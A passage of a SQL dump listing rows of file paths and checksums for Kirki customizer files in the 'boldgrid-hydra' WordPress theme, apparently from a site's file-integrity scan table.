i/controls/toggle/toggle.js',0,0xCC5E3947E5A73DCDD965128E7D3DA045,0xCC5E3947E5A73DCDD965128E7D3DA045,0x30727E505C9F7F0CF7E612D889D0ED45E936711C7CB0660528EA3494F2C21FB2,'',0,'?'),(0x0A0C050205637619D813DEFE1A9D8FE1,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/typography/class-kirki-control-typography.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/typography/class-kirki-control-typography.php',0,0x1AF3155033E622471F7AD2C07B1AA58C,0x1AF3155033E622471F7AD2C07B1AA58C,0xAF8A65ACA08FF6E02A3780E24A4365D539054001454DCA9AA69735341DD9021B,'',0,'?'),(0xA7AED5F6E2D8C7B3A959339487E97A82,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/typography/typography-legacy.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/typography/typography-legacy.js',0,0x6F68997892DF2DB0E7B28EDC179F16CA,0x6F68997892DF2DB0E7B28EDC179F16CA,0x8298DBCC879A7371B1BE13BC49D37F3D35FD8495977BC5F4E60CC4BA64305F2E,'',0,'?'),(0xFA78CE6EF311EB9C1300813BD97871D6,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/typography/typography.js','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/controls/typography/typography.js',0,0x6C4E26C70503ED9F97AE70D1E491B672,0x6C4E26C70503ED9F97AE70D1E491B672,0x05C998717C607681CB9E26DCF5494D06DFFD5D061D9D9CB4EC9B31552DA57AF3,'',0,'?'),(0x47BBFD28915BD5722C13AD4541717D6C,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-active-callback.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-active-callback.php',0,0xFFA0EC20D427DB62309872ADF1AC2CCD,0xFFA0EC20D427DB62309872ADF1AC2CCD,0xFE218CD39BEED1F23EFCB2794E13F1D3B7CD7D402BDBC8D72C8F4C8EEB9C25CC,'',0,'?'),(0xD0C673D9566AE9088180F214A8CC038A,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-config.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-config.php',0,0x302764764125376376165A7F8BE32C38,0x302764764125376376165A7F8BE32C38,0xF68CAE7D81EBD38DEB5EA86069EA6533FA37CC597D4252AD3C288DB2554BAB18,'',0,'?'),(0x40ABE2315385D8A667D1EEEA870CE658,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-control.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-control.php',0,0xE3C9DAA596761B3DC52DE2D7A05CE58E,0xE3C9DAA596761B3DC52DE2D7A05CE58E,0x90AA5B66BB1F5B6D8733BA2A25776EDF6D978E6FBB6D054BE3069E279AD411D2,'',0,'?'),(0x8FDF7DFE62C53C79074E48B960ED6966,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-field.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-field.php',0,0x1D1D56678F9CF8FE0D54ABEC02B0DABB,0x1D1D56678F9CF8FE0D54ABEC02B0DABB,0xEFCF3BC953D08E0755AD40E3C53493CB485ADE493995500FAC5F74959FEC0178,'',0,'?'),(0xF274136D49D7941FC3C4D1196B586A7D,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-helper.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-helper.php',0,0x5CBD3DE24E0CBABE477D49DD8B184B24,0x5CBD3DE24E0CBABE477D49DD8B184B24,0x43AEF2C7E08D76C503CA84347EA1AD9EE30F057A5E51D17702CC9788B1CB9376,'',0,'?'),(0x3076A1BBFE86CCA673CDD49E10CA900D,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-init.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-init.php',0,0xE4E4496446411999FF7E04A14B24C0DD,0xE4E4496446411999FF7E04A14B24C0DD,0xFD6FA335DC3508A1FC465616CC42ECDE10A866CD586409C0FC23CD7955533D3C,'',0,'?'),(0x96CD24280D04CAE8AD7059A7F221EDF2,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-l10n.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-l10n.php',0,0x975C35CFC36DC8F5728DCC87991AC1CB,0x975C35CFC36DC8F5728DCC87991AC1CB,0xDA15B8DBD651B451CA0E3173DDCE29084FA3FF116E94F9DDE6DFA7BDE4CACC6E,'',0,'?'),(0x9A37572397A64EC161437B41E61CA1E3,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-modules.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-modules.php',0,0x54CC8DB94B1E0B01ABB86AD381768AFE,0x54CC8DB94B1E0B01ABB86AD381768AFE,0xA39AF1056C307CE63F6661E2616952481B22009CFC9801E1977A9EA4CBD31E02,'',0,'?'),(0xCA673F889055002C2D4CFD3930EAA721,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-panel.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-panel.php',0,0xDBCC2B7AF13F73355765FCAC74851C1E,0xDBCC2B7AF13F73355765FCAC74851C1E,0xEE92AFD527EAF15E6A35F42415295F377815EB1AA2CCD0A8D2FF0AD7DF9C6B83,'',0,'?'),(0x1A07EA176F62E01D26BF4C3A21FAEAC7,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-sanitize-values.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-sanitize-values.php',0,0x2D2B91643F5BE14FEB5D657E22159499,0x2D2B91643F5BE14FEB5D657E22159499,0x8173738FEC949DAA2257923D9008E7C350194630D64B5215E6DDCFF151DE5505,'',0,'?'),(0x2FC076C928FE6B57FA709C10D0AB4D64,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-section.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-section.php',0,0x6008D88C4DEB4108B4D75F4A71CB4E25,0x6008D88C4DEB4108B4D75F4A71CB4E25,0xFB5D33D307D7D0228D76722C91BD9601B6F72F97E8418795004C732B44E5C10A,'',0,'?'),(0x2DEE7711183AA45A0279D5412385B545,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-setting-site-option.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-setting-site-option.php',0,0x7BBF9FEF83A0EC4C106D19B7357EB2EF,0x7BBF9FEF83A0EC4C106D19B7357EB2EF,0x1687D28501B934E9C9A93D4A4A530EE5EBFF76EA05A48F4B26E1E3927795BCFE,'',0,'?'),(0x904D76E0CE9EE7564225023BA47BDD97,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-setting-user-meta.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-setting-user-meta.php',0,0x4F91571B7685C1C9BE56E2798D29994F,0x4F91571B7685C1C9BE56E2798D29994F,0x89361504A02C5EDD0FBCB20A90BDCFE3FB513ABE2A2F36D9BA422B9CF0ABB0F7,'',0,'?'),(0xF8A51A897D6673FDBF0ECBF9C9D9FEF4,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-settings.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-settings.php',0,0x38C053DCFFA7A257E84C6749FCECA1DC,0x38C053DCFFA7A257E84C6749FCECA1DC,0xDD8114E7782D38AE29FE43935B3A8F90BD26C73306CD16684E47328A384F9377,'',0,'?'),(0x132051F8CFD41450EA201BD1FED55BD9,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-toolkit.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-toolkit.php',0,0x36915B814A4FF9E243B3553693DA2070,0x36915B814A4FF9E243B3553693DA2070,0xA914BC2110F82CD640A9263359BBB431EE8859501E4DAB850E6B9CBBBE0C1235,'',0,'?'),(0xC1CC492D67A2EEE27302013AFDD66D78,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-util.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-util.php',0,0xBD31F89F454F998C963447D5277D3576,0xBD31F89F454F998C963447D5277D3576,0xFF0D9DBB4CADFE795DF4FD24A2E28463780E44432B2C95CAC66115B4A8D439B3,'',0,'?'),(0xA23672110095C62B1859DE5975FAEF74,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-values.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki-values.php',0,0x8F42A3C603029B7A9F88942D47943C51,0x8F42A3C603029B7A9F88942D47943C51,0x28F13319F05C810BA98E5BD081D14EA3B27AE07972A8B75F584B21F6B9513E72,'',0,'?'),(0xCF87650E04C6C621EFD02170EB00F5F7,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/class-kirki.php',0,0xDFB331315385B9FB17FA33051E38B6DA,0xDFB331315385B9FB17FA33051E38B6DA,0x45E5228DD1783F9FC34B71F35FB14F87BF5CAC670D6FA5A29BAC559A0492CC42,'',0,'?'),(0x1FB3FA99BC7E5044A2ECDD64780CC806,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/deprecated.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/deprecated.php',0,0xDBF09B573F3D86BCE2329172D9F79FB2,0xDBF09B573F3D86BCE2329172D9F79FB2,0xCC173EAE656BD053E4F938679A24CFFA265F75547BE4A2DFF20DEB817393BB3E,'',0,'?'),(0x00B15A42CAFEA3A0FCC1AE321E25C49C,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/dynamic-css.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/core/dynamic-css.php',0,0xCBFE680E186E59542E63A79CE782D7B1,0xCBFE680E186E59542E63A79CE782D7B1,0x936DA24DCEDB6E87E0B92044C87C0D14D4D7FDB8D26CA44DD634BC193FA16F54,'',0,'?'),(0x6EF900BC93AE83E8A5F285CAF60CEDDB,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/example.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/example.php',0,0xCF87249039F6057E1F6844267A2C9403,0xCF87249039F6057E1F6844267A2C9403,0xFB75584B6B675A7D61F5286B3C733B80E2A7D278BB54185C3DFC52970054341F,'',0,'?'),(0xAEE2F2F56D3DE0AB4A6D1FF8D5770F34,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-background.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-background.php',0,0xE0C2D8A6CD34AF78B42AADAEEF6BEF9D,0xE0C2D8A6CD34AF78B42AADAEEF6BEF9D,0xA8A1FB6CDD2BDA4AE0327CF5B7406C0AD2F8BE06A42BB9AE78F3F4727D354014,'',0,'?'),(0x53F1B8558A8058B7A8C03EC8B21FE931,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-checkbox.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-checkbox.php',0,0x8AB54AD989E30BD662A1A28001FE6185,0x8AB54AD989E30BD662A1A28001FE6185,0xD94B7410CC3482D7436156F0F66E337C2CEF6D2E080CBE4A92FBE6F6789A2850,'',0,'?'),(0x5CFFEAD687E843217D1BEADE97695855,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-code.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-code.php',0,0x1CE0E9241C311DDD96007786807B535B,0x1CE0E9241C311DDD96007786807B535B,0x2DB64EFA1757B105BB060C0A6573BD030D45F3DC02ACDF2127E2BD5348576163,'',0,'?'),(0x5794A64F92F9AFECB75C712F8A046549,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-color-alpha.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-color-alpha.php',0,0x2C3015C1652B0015BAB8DFBF8BA696D8,0x2C3015C1652B0015BAB8DFBF8BA696D8,0x4E53FBE8B3CF5501DC50D6011E310E76A4E0470336434B514053866A54BE2CDD,'',0,'?'),(0x9DAD18AC49CBE58E657C8E3F97F00E0D,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-color-palette.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-color-palette.php',0,0xD7EC3387E999A3E743E0F00D3D0D8E7B,0xD7EC3387E999A3E743E0F00D3D0D8E7B,0xACC2EF8A7B95A0B6D50FBC64A9D95C09917331FB773E00790CFD045B7D99EDD7,'',0,'?'),(0xE8A32F03A214B8DF1DF64E7003627C2A,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-color.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-color.php',0,0xB6CFDF70889F8CB37D245B32167C26F1,0xB6CFDF70889F8CB37D245B32167C26F1,0x4201F2D20B67915378369327CCCCFED91EED80A1D3C646FE4A4FE3D4D85ED9EE,'',0,'?'),(0xF894DE409EC6E5ECC7690BBF5172C839,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-custom.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-custom.php',0,0x99CD5104DB0DCB36370FF39DE8E260C8,0x99CD5104DB0DCB36370FF39DE8E260C8,0xC0787B48512D9420C0C614F3B1B364DB20ECD4AE249069FC2511A172A694D827,'',0,'?'),(0xA740491F7C856F395639743F1ECF1B70,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-dashicons.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-dashicons.php',0,0x2AFF02D6115CAECFFFECCEA0555C6ECA,0x2AFF02D6115CAECFFFECCEA0555C6ECA,0x4362387F8E628DCF7CAE77B4043178AB68A51CA68BCD8D2ABD34E1139F73C85B,'',0,'?'),(0xFF5D3E5ED9AAAFF1292F462212E57CF8,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-date.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-date.php',0,0x0F87A464329E8B374009E17F66C0D288,0x0F87A464329E8B374009E17F66C0D288,0x8CF02308EC77AFAF4524C7027FEE4D931BB5968501B68A7A901B7C8328A9372E,'',0,'?'),(0x62D7060D604B3F04B03A860CE0032997,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-dimension.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-dimension.php',0,0x38AF01DD90122A447D4D357558EA45C5,0x38AF01DD90122A447D4D357558EA45C5,0xD4D7CF84AE8855EDC22D9FF26F0080E56851908090481594776628CE22F46670,'',0,'?'),(0x6CA4ABA1419B6B42358BBDB207B675CF,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-dimensions.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-dimensions.php',0,0x0F50CAF6501E672985C2EEAF8280A574,0x0F50CAF6501E672985C2EEAF8280A574,0x3CC4A12A66C5D671F76102314931159A1B25CA137E03985411871B21C95BABEF,'',0,'?'),(0x315D07D8C2E93E8A6E99C622087AF508,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-editor.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-editor.php',0,0x38946AB28453BE6988BA0AC5B3360EB7,0x38946AB28453BE6988BA0AC5B3360EB7,0xF8471F88075E0FA0530B2D58EB5CE7168A15354BFBCE5EDA1B419795BFAC1038,'',0,'?'),(0x17EB378D383302D6D0F6110F95C7876E,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-fontawesome.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-fontawesome.php',0,0xB12E7AFB616664D86939AE349545DEFC,0xB12E7AFB616664D86939AE349545DEFC,0x8374B6E649417DD0299D6D1966432D57B5C094F67C84008B616791EFE81D2DCE,'',0,'?'),(0x2ED981482947283F88A53AC521369DA7,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-generic.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-generic.php',0,0x0D0094931B00D198FB2A3AE90261A32E,0x0D0094931B00D198FB2A3AE90261A32E,0x96EC2EECF92217034028C2861D8989F90C7A46181CF9EB30499292AB2458A7BC,'',0,'?'),(0xD541C3D88C6EE74E919253DEF741225E,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-group-title.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-group-title.php',0,0x71D09B4ADC9D95C3EDC7C24A55567C36,0x71D09B4ADC9D95C3EDC7C24A55567C36,0x37F4261B0E2DD0331C8642B24CE74D925018A416B1FD8F9240B537C59FFE3F28,'',0,'?'),(0xFDC8D370307AE285DF96371BD6354DDD,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-image.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-image.php',0,0x17C27FE9E21C7ADC53C7448CB1BF7D39,0x17C27FE9E21C7ADC53C7448CB1BF7D39,0xD1458421E4806DA42F85309C845B6CED070D62D04FAFAE9ED901629D82D2A4AE,'',0,'?'),(0x194C4C346B30F82958F425F1E1F1233F,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-kirki-generic.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-kirki-generic.php',0,0x3C86FFEBC73991047212EB7368B4CCBC,0x3C86FFEBC73991047212EB7368B4CCBC,0xFA7F48E43ED7D48FD4FCC06B95C8911FFD9945124B0EB3E42A8C4D3254958865,'',0,'?'),(0x64CA1DE1A00F92C343D80759CC3E1A9D,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-link.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-link.php',0,0xFFAF2F0086BF4003E8AD67F4A08564A2,0xFFAF2F0086BF4003E8AD67F4A08564A2,0xB12D9E62A2B01D793CEDE752BFA108BBAB5E447F1F91DCB38026EBAE218FD333,'',0,'?'),(0x623388A2F8A7DD42044792F682004AA4,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-multicheck.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-multicheck.php',0,0xF2124281B665FAC8FD13FF22DE27229F,0xF2124281B665FAC8FD13FF22DE27229F,0x7ABF191BB98B4783F6146BF6F76F6121B1B3619C31185C200D03CB48409DDA20,'',0,'?'),(0x139096CF091F3A471CBAB8EF8C37D008,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-multicolor.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-multicolor.php',0,0xBF18F6235A7C551BB4070DB1D7609232,0xBF18F6235A7C551BB4070DB1D7609232,0x2DEF1A574E87A066A6C777CDFDF564BF6F5ABD22A7E55EBA3772C18CAA53BC88,'',0,'?'),(0x00D3E3C108D793531098445676597187,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-number.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-number.php',0,0x6E463EAE3ECCE9D4CB17635DC7485B84,0x6E463EAE3ECCE9D4CB17635DC7485B84,0xD1E3C45E25E3B68C6632B7425DEDE341B74197CB13D0009549B3A087C9FAAB34,'',0,'?'),(0xE671A6591E3D39B52284F5C4FC4B7285,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-palette.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-palette.php',0,0x5C565D19B1B1AEF54430251CAA0D2FE4,0x5C565D19B1B1AEF54430251CAA0D2FE4,0x665125B82B36752E12F2C4EEB7C265D3A5E63AF64D24FC2E62F3A9819BDB144D,'',0,'?'),(0xC424EE1F2B1014F21500931FD2974746,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-preset.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-preset.php',0,0x64157C6294EDA27F6CA03BDBF0D5B37E,0x64157C6294EDA27F6CA03BDBF0D5B37E,0xA6194E8D4FD25693257D1345536D0B840387D7245A5CEB43C6654C40E268E610,'',0,'?'),(0x4ABBE7CDFB1C22AE641A0BDE77862379,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-radio-buttonset.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-radio-buttonset.php',0,0x7E214928C45DAA52C30195301B8CFB87,0x7E214928C45DAA52C30195301B8CFB87,0x6C70CF3C799407D079B6A41B1D113B085A5E2A24E529B37E2E1FB788B3FD369D,'',0,'?'),(0xB9B2EB321FD5A027F0EB19B718B90CED,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-radio-image.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-radio-image.php',0,0xCE418930285DCDCA9D8081EC773B9A64,0xCE418930285DCDCA9D8081EC773B9A64,0xA50BE3F8DA602814A08F482753B63313EB866180A496EB039D1C9D408DE2C1F4,'',0,'?'),(0x17915AFB22F48E628C3F73AB2890DBBF,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-radio.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-radio.php',0,0xC5247360AEF2BF16A8E70A538B4D97B8,0xC5247360AEF2BF16A8E70A538B4D97B8,0x25B866BA28D8500A8611078D2AD8E193188996C8DF2A2287608FB6812895A358,'',0,'?'),(0x6EDB2C33F6DF004A0972B998BDB3B1CF,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-repeater.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-repeater.php',0,0x28957682C3C74AC26FFA6EC4080DF78A,0x28957682C3C74AC26FFA6EC4080DF78A,0xE4A834E26C77B5FD08B832D2722A6C99F13F51E78C31A4AE225CA071D9A09F2D,'',0,'?'),(0x41E20A702827B4E38194A8560C83B513,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-select.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-select.php',0,0x38956C5E5EBFE3A9FDF538921577D068,0x38956C5E5EBFE3A9FDF538921577D068,0xD668DF4B845A66401B93612F353979CEE48A6BE4275878C5552ACA34155665B1,'',0,'?'),(0x9E004E198461FEA46C8156C057EB4FCC,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-select2-multiple.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-select2-multiple.php',0,0x580968BE74667135D510F2A8EF8E8A2F,0x580968BE74667135D510F2A8EF8E8A2F,0xA868559A17ACA11B1F2BC61F233A7E605E106F9CC9DB008CCD06A4D50A17E2A1,'',0,'?'),(0x0E9BBBB3F0C0EB7BF14C57306472549E,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-select2.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-select2.php',0,0x891E5968C5F4AE43EAA13551BFA0F41C,0x891E5968C5F4AE43EAA13551BFA0F41C,0x6D47D396F93C985480EE5F05F31FA6DA6ABB76834487961C865957664333D1E1,'',0,'?'),(0x98B465878EEBAC0F29899A84CE94295D,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-slider.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-slider.php',0,0x4ED2593CC2A4568C6C661C04E3C7E2D4,0x4ED2593CC2A4568C6C661C04E3C7E2D4,0x1D62632D28AA131114AFE50B0BB4597A701AFF9CCD7895F2DBFB1C7A4FB16FBC,'',0,'?'),(0xB32445BF04C2469FE5520B15BF08435E,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-sortable.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-sortable.php',0,0x51D07CEBDAFF63AC5CD522E07CE52051,0x51D07CEBDAFF63AC5CD522E07CE52051,0x9C8CB44D19B354D7D56172DEB809444D2309772C19B61A1004B8C951C14FCC46,'',0,'?'),(0x2E4109C14F51C974C74B576A8B79EC11,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-spacing.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-spacing.php',0,0x7FFC34497E1F6FB3CAB699600B1BCE57,0x7FFC34497E1F6FB3CAB699600B1BCE57,0x518F4EBE2576B81908A50E168602749A679A001CEE1A858323E5C9A8DA46428C,'',0,'?'),(0x75875BDA799017D479F54004D6CA3847,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-switch.php','/home/eckank5/public_html/wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-switch.php',0,0x120A3FDDD81092035B707DF2C3BFC4AB,0x120A3FDDD81092035B707DF2C3BFC4AB,0xB4EA24989988FC6250C378DF3BADBEF16921634176ED8BF6946478E80234D8E1,'',0,'?'),(0xAFDABBEE31CC3B71952AF5031924BFC2,'wp-content/themes/boldgrid-hydra/inc/boldgrid-theme-framework/includes/kirki/field/class-kirki-field-t